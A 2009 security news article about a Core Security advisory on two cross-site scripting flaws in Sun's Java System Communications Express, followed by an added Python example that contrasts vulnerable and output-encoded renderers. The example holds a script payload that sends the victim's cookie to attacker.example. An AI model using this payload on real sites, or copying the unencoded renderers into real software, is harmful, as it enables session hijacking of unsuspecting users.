Sun Java web application vulnerability details

Core Security Technologies : 25 May, 2009  (Technical Article)
Cross Site Scripting vulnerability in Sun Java application discovered by Core Security Technologies
Core Security Technologies, provider of Core Impact solutions for comprehensive enterprise security testing, has issued an advisory disclosing critical vulnerabilities that could affect large numbers of end users and organizations using Sun’s Java System Communications Express Web-based communications and collaboration application.

Core Security Technologies consultants working with CoreLabs, the research arm of Core Security, found multiple vulnerabilities in Sun’s Java System Communications Express, the remote-access component of Sun’s Java Communications Suite. If exploited, the cross-site scripting (XSS) bugs would let attackers target users of the application.

Upon making the discoveries, CoreLabs immediately alerted the Sun Security Coordination Team to the vulnerabilities and the two companies have since synchronized efforts to ensure that patches could be created and made available to protect users of the program.

“Cross-Site Scripting bugs are popular among attackers attempting to coax Web applications into providing control of end users’ Web browsers to carry out a wide range of malicious schemes,” said Ivan Arce, CTO of Core Security Technologies. “It is very important that organizations take the necessary steps to ensure that the applications they build or license from third parties are not susceptible to these types of exploits.”

Sun’s Java System Communications Express is aimed primarily at organizations seeking to offer their users remote access to browser-based email, calendaring and task management.

The XSS issues uncovered in Java System Communications Express reside in two of the product’s URLs, one of them in the personal address book. They were initially discovered and researched by the Security Consulting Services team at Core Security Technologies.

CoreLabs security researchers found multiple XSS vulnerabilities in Java System Communications Express, specifically in two individual URLs. Cross-site scripting (XSS) vulnerabilities allow an attacker to execute arbitrary script code in the context of the user’s browser, within the vulnerable application’s domain. For example, an attacker could exploit an XSS vulnerability to steal the user’s cookies (and then impersonate the legitimate user) or redirect the user to a fake page that asks for information such as credentials. This class of vulnerability arises when user-supplied data is written into HTML output without encoding.

The first XSS vulnerability is in the Personal Address Book “add contact” functionality. The affected URL is normally reached through a POST request, but the flaw can be exploited with either a GET or a POST request. The variables involved are not encoded when they are written into the HTML output, so an attacker who controls their content can insert JavaScript code.

In the second vulnerability, the contents of the URL are not encoded when they are written into the HTML output, again allowing an attacker who controls them to insert JavaScript code. This flaw can be exploited through a GET request, and the user does not need to be logged into the web application. That makes it particularly suited to email-based attacks: an attacker can send the victim a link that appears to point to a ‘calendar’, and the flaw is exploited as soon as the link is opened, with no prior login required.
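The two patterns described above, as an added example that is not code from the original article or from Sun’s product: a request handler that merges GET and POST parameters (so a page “normally reached through POST” is equally reachable through a crafted GET link), a renderer that reflects them into HTML attributes unencoded beside a hardened version that applies HTML encoding at output time, and a page that echoes part of the URL into its body. The parameter names (`name`, `email`, `view`), paths (`/addcontact`, `/calendar`) and payload are assumptions constructed for the example, not the product’s real parameters or the advisory’s exploit.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payload for the example: break out of a double-quoted attribute,
# then inject a script tag that exfiltrates the session cookie.
PAYLOAD = '"><script>document.location="http://attacker.example/?c="+document.cookie</script>'


def params_from_request(method, url, body=""):
    """Collect request parameters from the query string and, for POST, the form body.

    Hypothetical request handling (not the product's code). It models the first
    point in the advisory: a page that is normally reached by POST also accepts the
    same parameter names via GET, because both sources feed the same renderer.
    """
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if method.upper() == "POST":
        params.update(parse_qs(body, keep_blank_values=True))
    return {name: values[0] for name, values in params.items()}


def render_add_contact_vulnerable(params):
    """Reflects parameters into HTML attributes with no encoding: the bug class."""
    name = params.get("name", "")
    email = params.get("email", "")
    return (
        '<form method="post" action="/addcontact">'
        f'<input name="name" value="{name}">'
        f'<input name="email" value="{email}">'
        '</form>'
    )


def render_add_contact_hardened(params):
    """Same page with HTML attribute encoding applied when the value is output.

    quote=True also encodes " and ', so an attacker cannot close the attribute.
    """
    name = html.escape(params.get("name", ""), quote=True)
    email = html.escape(params.get("email", ""), quote=True)
    return (
        '<form method="post" action="/addcontact">'
        f'<input name="name" value="{name}">'
        f'<input name="email" value="{email}">'
        '</form>'
    )


def render_url_echo_vulnerable(view):
    """Second pattern: a value taken from the URL is echoed into the page body unencoded."""
    return f'<p>Calendar view: {view}</p>'


def render_url_echo_hardened(view):
    """Hardened echo: text-context HTML encoding of the URL-derived value."""
    return f'<p>Calendar view: {html.escape(view, quote=True)}</p>'


def reflects_unencoded(rendered, marker="<script>"):
    """Crude tester's check: did the injected tag survive as live markup?"""
    return marker in rendered


def demo():
    """Drive both patterns through the vulnerable and hardened renderers.

    Returns a dict of booleans: True means the payload came back as live markup.
    """
    # A GET link carrying the payload in a parameter the page usually receives via POST.
    get_url = "/addcontact?name=" + quote(PAYLOAD, safe="") + "&email=alice%40example.com"
    contact_params = params_from_request("GET", get_url)

    # The same payload carried in the URL of a page that requires no login.
    echo_url = "/calendar?view=" + quote(PAYLOAD, safe="")
    view = params_from_request("GET", echo_url).get("view", "")

    return {
        "contact_vulnerable": reflects_unencoded(render_add_contact_vulnerable(contact_params)),
        "contact_hardened": reflects_unencoded(render_add_contact_hardened(contact_params)),
        "url_vulnerable": reflects_unencoded(render_url_echo_vulnerable(view)),
        "url_hardened": reflects_unencoded(render_url_echo_hardened(view)),
    }


if __name__ == "__main__":
    for case, reflected in demo().items():
        print(f"{case}: {'script reflected' if reflected else 'encoded'}")
```

The hardened renderers encode at the point of output rather than filtering on input, which is the fix that survives data arriving by any route (GET, POST, or a stored record). Note that `html.escape` is correct for HTML text and attribute contexts only; a value placed inside a `<script>` block, a URL, or a CSS property needs the encoding for that context instead.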